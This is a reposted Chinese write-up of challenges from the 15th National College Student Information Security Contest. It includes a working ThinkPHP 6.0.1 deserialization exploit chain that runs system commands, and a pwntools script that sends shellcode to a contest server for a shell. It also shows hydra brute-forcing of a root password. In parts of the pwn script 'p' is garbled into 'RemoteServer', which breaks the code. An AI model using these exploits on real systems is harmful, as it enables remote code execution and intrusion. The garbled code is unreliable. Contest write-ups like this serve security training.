第十五届全国大学生信息安全竞赛创新实践能力赛

这篇具有很好参考价值的文章主要介绍了第十五届全国大学生信息安全竞赛创新实践能力赛。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文章来源地址https://www.toymoban.com/news/detail-467875.html

基于挑战码的双向认证1

第十五届全国大学生信息安全竞赛创新实践能力赛

这两个应该是属于非预期,查找文件内容,两个flag都出了:

find / |xargs grep -ri flag{ 2>/dev/null
flag{34f5fdaf-c373-47fd-afab-01ed2914c11a}

基于挑战码的双向认证2

解题步骤同上

基于挑战码的双向认证3

第十五届全国大学生信息安全竞赛创新实践能力赛

使用hydra爆破获得root密码toor。

登陆查找(find / |xargs grep -ri flag{ 2>/dev/null)获得flag
第十五届全国大学生信息安全竞赛创新实践能力赛

flag{7b352ef0-1bb1-41af-a7d7-b74f62ff23f0}

ISO9798

第十五届全国大学生信息安全竞赛创新实践能力赛

  1. 爆破sha256老脚本套路了
import hashlib
dic = '0123456789abcdefghijklmnopqrstuvwxyzQAZWSXEDCRFVTGBYHNUJMIKOPL' 
for a in dic: 
    for b in dic: 
        for c in dic: 
            for d in dic: 
                t = str(a)+str(b)+str(c)+str(d)+'EvLOXDipk6pWH7ci'
                #print(t)
                sha256=hashlib.sha256(t.encode("utf8")).hexdigest()
                #print(sha256)
                if sha256 == 'ca0dddf277edecadf0de6f6c6c99ee2664a736ad847f8a345970a6f233eb6910': 
                    print(t)
                    break
  1. 结合后面的题这个值就传0,使其rb为0

  2. 然后他给的是rA||rB||B加密的结果,要我们给rB||rA.,猜测是ECB模式加密。,所以直接将第一块和第二块换一下位置即可
    第十五届全国大学生信息安全竞赛创新实践能力赛

最终得到flag,

flag{0fc5a96c-16e5-497e-955a-3e7356bd549c}

Ezpop

  1. 存在源码泄露,访问www.zip拿到源码,在app/controller/Index.php中发现test控制器存在一个用户可控的反序列化输入点

利用ThinKPHP6.0.1的反序列化漏洞利用链构造后成功在根目录下获取flag,POC如下
第十五届全国大学生信息安全竞赛创新实践能力赛

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}
namespace{
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

第十五届全国大学生信息安全竞赛创新实践能力赛

flag{8c3f66f3-f3ca-4b6e-be63-9230376498fc}

login-nomal

  1. 其实就是一个菜单逆向题目,首先进入1之后修改flag标志,然后进入2发送可见shellcode(shellcode自己构造就行)
from RemoteServerwn imRemoteServerort *

ShellCode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0RemoteServer160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8RemoteServer115l1n0J0h0a071N00"

def main():
    context(log_level='debug', arch='amd64', os='linux')
    #RemoteServer = RemoteServerrocess("./login")
    RemoteServer = remote("101.201.144.230", 24613)
    libc = ELF('./libc-2.33.so')

    RemoteServerayload1 = 'ORemoteServerT:1\nMSG:ro0ta\n'
    RemoteServerayload2 = 'ORemoteServerT:2\nMSG:'+ShellCode+"\n"
    RemoteServer.recvuntil(">>> ")
    RemoteServer.sendline(RemoteServerayload1)
    RemoteServer.recvuntil(">>> ")
    RemoteServer.sendline(RemoteServerayload2)

    RemoteServer.interactive()

if __name__ == "__main__":
    main()


第十五届全国大学生信息安全竞赛创新实践能力赛

flag{7d4521c1-4789-4365-8475-86cb048eeaf1}

ez_usb

  1. 通过wireshark打开发现存在两种usb的流量信息,通过过滤全选导出分组将其另存,过滤语法为usb.src =="2.10.1"和usb.src =="2.8.1”
  2. 利用UsbKeyboardDataHacker.py脚本(github上可找)对其解密获得压缩包的十六进制和压缩包的密码
    第十五届全国大学生信息安全竞赛创新实践能力赛
  3. 整理压缩包的十六进制,置空<CAP>,删除<DEL>前的一个字母c,保存后解压得到flag

第十五届全国大学生信息安全竞赛创新实践能力赛

flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}

签到

打开链接根据摩斯密码表点击三次按钮输入s启动,根据公众号的提示和密码本进行模十算法,如图

第十五届全国大学生信息安全竞赛创新实践能力赛
第十五届全国大学生信息安全竞赛创新实践能力赛

根据提示将得出的数据发包即可得到flag
第十五届全国大学生信息安全竞赛创新实践能力赛

flag{59727c32-14c9-4bf1-9c65-cbeae9d8a247}

问卷调查

填写问卷即可得到flag。
第十五届全国大学生信息安全竞赛创新实践能力赛

flag{Thanksforplayingourgames

everlasting_night

根据提示,用stegsolve进行分析,挨个查看,得到一串字符串
第十五届全国大学生信息安全竞赛创新实践能力赛

对其进行尝试lsb隐写解密,
第十五届全国大学生信息安全竞赛创新实践能力赛

查看文件内容,可以知道是加密的zip文件
在图片最后多余处,得到一串md5,MD5破解得到压缩包密码
第十五届全国大学生信息安全竞赛创新实践能力赛

第十五届全国大学生信息安全竞赛创新实践能力赛

解压得到flag的图片,用GIMP打开看到flag,但是不方便读,PS修改一下,得到flag

第十五届全国大学生信息安全竞赛创新实践能力赛

flag{607f41da-e849-4c0b-8867-1b3c74536cc4}

到了这里,关于第十五届全国大学生信息安全竞赛创新实践能力赛的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 全国大学生信息安全竞赛初赛writeup(历年CISCN真题与解析)

    收录了大佬们参加全国大学生信息安全竞赛初赛的writeup和真题环境,方便学习,排名不分先后,谨参考完整度和CSDN站内优先原则。 在此,对大佬们的分享表示由衷的敬意和诚挚的感谢! 第十二、十三届全国大学生信息安全竞赛——创新实践能力赛原题 如果遇到打不开的链

    2024年02月06日
    浏览(48)
  • HNUCM信息科学与工程学院第五届大学生程序设计竞赛——正式赛

    签到题 简单dp,取前面第五天的3倍就行 这题被封了不记得什么题了 枚举然后判断回文就行了 简单dp,不能跳的位置置0 算是一个简单思维题吧,先考虑偶奇依次排列,然后发现可能会剩下偶数或者奇数。 如果剩下的是偶数,因为偶数不会影响前面的奇偶性,所以在末尾首先

    2024年02月08日
    浏览(39)
  • 第十八届全国大学生智能汽车竞赛——摄像头算法(附带个人经验)

    参加了第十六,十七和第十八届全国大学生智能车竞赛,对摄像头的学习有部分心得,分享给大家,三届车赛,车赛生涯也算是到了尽头。打算从基础的算法开始,给各位一些个人看法,也是对车赛的一次总结。 闲话 :其实摄像头的算法有很多种,弄了两年摄像头,也只是

    2024年02月07日
    浏览(35)
  • 第十八届全国大学生智能汽车竞赛室外赛5g室外专项赛(湘大队)开源

            感谢十八届全国大学生智能汽车竞赛-室外赛的主办方和组委会让我们有了参加这次比赛的机会!当我们在参加5g室外专项赛时,我们发现很多的组又很多的同学都是第一次参加智能车竞赛对于智能车的了解还不是很深,对于代码如何编写需要哪些模块也不是很熟悉,

    2024年02月20日
    浏览(29)
  • 第十四届全国大学生电工数学建模竞赛A题-高比例风电电力系统储能运行及配置分析

     写在前面 博主:多次获得华为杯,电工杯,小美赛等数学建模一等奖、二等奖,拥有较为丰富的比赛经验,会分享一些建模的思路、算法以及比赛经验。 博主主页: Born for的博客_CSDN博客-预测,数学建模,深度学习领域博主 希望大家多多关注,大家共同进步! 目录 题目背景

    2024年02月05日
    浏览(36)
  • 全国大学生网络安全精英赛初赛(nisp一级)

    网络方面 。 1.FTP端口号21 Sftp指的是ssh文件传输协议默认端口号22. http端口号80 Https端口号443(http+ssl)(浏览器和服务器之间的加密协议) 发送邮件时,SMTP端口号是25,接收用到POP3技术。 共享文件夹端口445. 远程桌面端口3389 Telent

    2023年04月13日
    浏览(42)
  • 2022第三届全国大学生网络安全精英赛练习题(9)

    801、近年来,我国面临日趋严峻的网络安全形势,党和国家高度重视信息安全建设,关于网络安全形势的描述中,理解错误的是(() A.我国的网络安全形势差,但在党和国家高度重视的情况下,面临各种攻击、威胁都能解决,发展稳定 B.持续性威胁常态化,我国面临的攻击十

    2023年04月08日
    浏览(37)
  • 2022第三届全国大学生网络安全精英赛练习题(4)

    301、Windows10各版本中,功能最少的是() A.家庭版 B.专业版 C.企业版 D.教育版 正确答案:A 解析:功能从少到多∶家庭版——专业版——教育版——企业版(教育版和企业版功能基本相同) 302、漏洞扫描技术是一类重要的网络安全技术。它和防火墙、入侵检测系统互相配合,能够有

    2024年02月05日
    浏览(40)
  • 2022第三届全国大学生网络安全精英赛练习题(2)

    101、通过“计算机管理”来清除时间日志也可以达到清除痕迹的目的,具体操作是() A.禁用“event system”服务 B.禁用“net logon”服务 C.禁用“event log”服务 D.禁用“secondary logon”服务 正确答案:C 解析:通过“计算机管理”来清除时间日志也可以达到清除痕迹的目的,如果禁用“

    2024年02月05日
    浏览(39)
  • 2022第三届全国大学生网络安全精英赛练习题(全部试题)

    1、某公司技术人员利于自己的技术入侵了某电商数据库,将其中的用 户数据下载后在暗网中进行售卖,该行为的处置最适用的是以下那部法律?( ) A.刑法 B.网络安全法 C.电子签名法 D.劳动法 正确答案:A 解析:入侵他人网站,角触犯的是刑法,不属于民事责任 2、网络环境日益复

    2023年04月09日
    浏览(85)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包